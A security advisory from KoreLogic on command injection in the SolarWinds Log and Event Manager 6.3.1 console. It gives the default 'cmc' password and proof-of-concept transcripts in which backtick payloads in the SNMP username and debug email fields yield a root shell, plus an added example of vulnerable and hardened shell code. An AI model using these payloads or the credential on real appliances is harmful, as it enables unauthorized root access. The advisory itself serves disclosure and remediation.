Solarwinds LEM Management Shell Escape via Command Injection

2017-04-24T00:00:00
ID KL-001-2017-007
Type korelogic
Reporter Matt Bergin (@thatguylevel)
Modified 2017-04-24T00:00:00

Description

Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt

  1. Vulnerability Details

    Affected Vendor: Solarwinds
    Affected Product: Log and Event Manager Virtual Appliance
    Affected Version: v6.3.1
    Platform: Embedded Linux
    CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command
    Impact: Privileged Access
    Attack vector: SSH

  2. Vulnerability Description

    Insufficient input validation in the management interface can be leveraged to execute arbitrary commands. This can lead to (root) shell access to the underlying operating system.

  3. Technical Description

    Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password".

    This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug.
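 Both vectors share one root cause: a shell-based console reads a value with
 `read` and later lets the shell re-parse it, so command substitution inside
 the value runs as a command. The following is an added example, not the
 advisory's PoC and not SolarWinds' code; the function names, the allow-list
 patterns and the "rouser" line format are assumptions chosen to illustrate
 the CWE-78 pattern next to a hardened version.

```shell
#!/bin/sh
# Added example (not from the advisory or the product). Function names and the
# allow-list patterns are assumptions used for illustration.

# Vulnerable pattern: the value is spliced into a string that eval re-parses,
# so backticks or $(...) inside it execute as commands (CWE-78).
render_snmp_line_vulnerable() {
    eval "printf 'rouser %s\n' $1"
}

# Allow-list check for an SNMP user name: non-empty, only [A-Za-z0-9._-].
# Returns 0 (safe) or 1 (rejected). Backticks, spaces, $, ; etc. all fail here.
is_safe_snmp_user() {
    case "$1" in
        '')                 return 1 ;;
        *[!A-Za-z0-9._-]*)  return 1 ;;
        *)                  return 0 ;;
    esac
}

# Allow-list check for a single mailbox address (the debug-recipient input):
# only [A-Za-z0-9._+@-], with a non-empty local part and domain.
is_safe_email() {
    case "$1" in
        *[!A-Za-z0-9._+@-]*) return 1 ;;
        ?*@?*)               return 0 ;;
        *)                   return 1 ;;
    esac
}

# Hardened pattern: validate first, then pass the value as a quoted argument.
# Without eval the shell never re-parses the contents of "$1".
render_snmp_line_safe() {
    is_safe_snmp_user "$1" || return 1
    printf 'rouser %s\n' "$1"
}

# Demonstration on constructed inputs; the second has the shape of the
# advisory's payload and is rejected before it can reach a command line.
for candidate in orion 'bad`echo x`name'; do
    render_snmp_line_safe "$candidate" || echo "rejected: $candidate"
done
```

 The safe variant never needs eval: a validated value passed as "$1" is a
 single word to the called program, whatever characters it contains. The
 allow-list is the primary control; quoting is what keeps a slip in the
 allow-list from becoming code execution.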

 ============
 = SNMP =
 ============

 This is accomplished by placing `/bin/bash` in the username
 input during SNMP server setup.

 $ ssh cmc@1.3.3.7
 Password:
 Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
 Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
   //////////////////////////////////////////////////
   ///       SolarWinds Log & Event Manager       ///
   ///                   management console       ///
   //////////////////////////////////////////////////

 Detected VMware Virtual Platform
 Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
 Available commands:
   [ appliance ]  Network, System
   [ manager ]    Upgrade, Debug
   [ service ]    Restrictions, SSH, Snort
   [ ndepth ]     nDepth Configuration/Maintenance
     upgrade      Upgrade this Appliance
     admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
     import       Import a file that can be used from the Admin UI
     help         display this help
     exit         Exit
 cmc > service
 Available commands:
     startssh           Start the SSH Service
     stopssh            Stop the SSH Service
     restartssh         Restart the SSH Service
     restrictssh        Restrict Access to the SSH Service (by IP Address/hostname)
     unrestrictssh      Remove Restrictions on Access to the SSH Service
     snmp               Configure the SNMP Services
     copysnortrules     Copy Snort rules to floppy or network share
     loadsnortrules     Load Snort rules from floppy or network share
     loadsnortbackup    Load Snort rules from backup
     restartsnort       Restart the Snort Service
     enableflow         * Enable the flow Collection Service
     disableflow        Disable the flow Collection Service
     restrictconsole    Restrict Access to the Manager Console (GUI) by IP/hostname
     unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
     restrictreports    Restrict Access to Reports by IP/hostname
     unrestrictreports  Remove Restrictions on Access to Reports
     stopopsec          Stop all running OPSEC LEA client connections
     help               display this help
     exit               Return to main menu

     NOTE: Commands with an asterisk (*) include an automatic manager service restart
 cmc::service > snmp
 SNMP Trap Logging Service is RUNNNING
 Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

 SNMP Request Service is RUNNNING
 Would you like to STOP the SNMP Request Service? [Y/n] Y

 The SNMP Trap Logging Service is stopped.
 The SNMP Request Service is stopped.
 cmc::service > snmp
 SNMP Trap Logging Service is DISABLED
 Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

 SNMP Request Service is DISABLED
 Would you like to ENABLE the SNMP Request Service? [Y/n] Y

 Enter the port number to access SNMP on LEM (default: 161):
 Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
 Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
 Enter the authentication password (default: orion123):
 Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
 Enter the encryption key (default: orion123):

 cmc@swi-lem:/usr/local/contego$

 ============
 = Debug =
 ============

 This is accomplished by placing `/bin/bash` in the destination
 email input during debug.

 $ ssh cmc@1.3.3.7
 Password:
 Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
 Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
   //////////////////////////////////////////////////
   ///       SolarWinds Log & Event Manager       ///
   ///                   management console       ///
   //////////////////////////////////////////////////

 Detected VMware Virtual Platform
 Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
 Available commands:
   [ appliance ]  Network, System
   [ manager ]    Upgrade, Debug
   [ service ]    Restrictions, SSH, Snort
   [ ndepth ]     nDepth Configuration/Maintenance
     upgrade      Upgrade this Appliance
     admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
     import       Import a file that can be used from the Admin UI
     help         display this help
     exit         Exit
 cmc > manager
 Available commands:
     actortoolupgrade   * Upgrade your Manager's Actor Tools (CD/floppy)
     archiveconfig      Set your Manager Database Archive Schedule/Settings
     backupconfig       Set your Manager Backup Schedule/Settings
     cleanagentconfig   Reconfigure the agent on this box to a new manager
     configurendepth    * Configure the manager to use an nDepth server.
     confselfsignedcert * Configure the manager to use a self signed certificate
     dbrestart          Restart database
     debug              Send Debugging Information to an Alternate Address
     disabletls         Disable TLS for DB connections
     enabletls          Enable TLS for DB connections
     exportcert         Export the CA certificate for console
     exportcertrequest  Export a certificate request for signing by CA
     hotfix             Install LEM hotfix.
     importcert         * Import a certificate used for console communication
     importl4ca         * Import a CA of the other node in L4 configuration
     licenseupgrade     * Upgrade your Manager License (CD/floppy/network)
     logbackupconfig    Set your Manager Log Backup Schedule/Settings
     resetadmin         Reset the "admin" user password to default
     restart            * Restart Manager Service
     sensortoolupgrade  Upgrade your Manager and Agent Sensor Tools (CD/floppy)
     showlog            Show Manager Log File
     showmanagermem     Show the memory setting of SolarWinds manager
     start              Start Manager Service
     stop               * Stop Manager Service
     support            Send Debugging Information to Tech Support @trigeo.com
     togglehttp         * Enable or disable HTTP (port 80).
     viewsysinfo        Show information about machine and SolarWinds manager
     watchlog           Watch Manager Log File
     exit               Return to main menu

     NOTE: Commands with an asterisk (*) include an automatic manager service restart
 cmc::manager > debug
 Press <enter> to capture debugging information
 You will need to provide an SMTP server or Windows File Sharing Credentials

 Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 .e.sudo: unable to resolve host swi-lem
 sudo: unable to resolve host swi-lem
 .cat: /etc/hosts: No such file or directory
  done.
 sudo: unable to resolve host swi-lem
 E-Mail/Network share/Quit? (e/n/q) e
 E-Mail/Network share/Quit? (e/n/q) e
 Please enter the e-mail recipient:
    (e.g. support@trigeo.com)
 > `/bin/bash >&2`
 Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
 Please enter the name this message should appear from
    (e.g. Someone Important)
 > Test
 Is the name Test correct? <Y/n> Y
 Please enter the e-mail address this message should appear from
    (e.g. someone@trigeo.com)
 > fake@localhost
 Is the e-mail address fake@localhost correct? <Y/n> Y
 Please enter the SMTP server you wish to send mail through
    (e.g. smtp.yournetwork.com)
 > 127.0.0.1
 Is the SMTP server 127.0.0.1 correct? <Y/n> Y
 Please enter the name of your company
    (e.g. Initech, Post Falls branch or Veridian Dynamics)
 > Test
 Is the company Test correct? <Y/n> Y
 Please enter a phone number where you can be reached
    (e.g. 509.555.1234)
 > Test
 Is the number Test correct? <Y/n> Y

 --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
 /tmp # id
 uid=0(root) gid=0(root) groups=0(root)
 --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--

  4. Mitigation and Remediation Recommendation

    The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

    https://thwack.solarwinds.com/thread/111223

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc.

  6. Disclosure Timeline

    2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds <psirt@solarwinds.com> using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
    2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel.
    2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact.
    2017.02.23 - Solarwinds confirms receipt of vulnerability report.
    2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details.
    2017.04.11 - Solarwinds releases hotfix and public disclosure.
    2017.04.24 - KoreLogic public disclosure.

  7. Proof of Concept

    See 3. Technical Description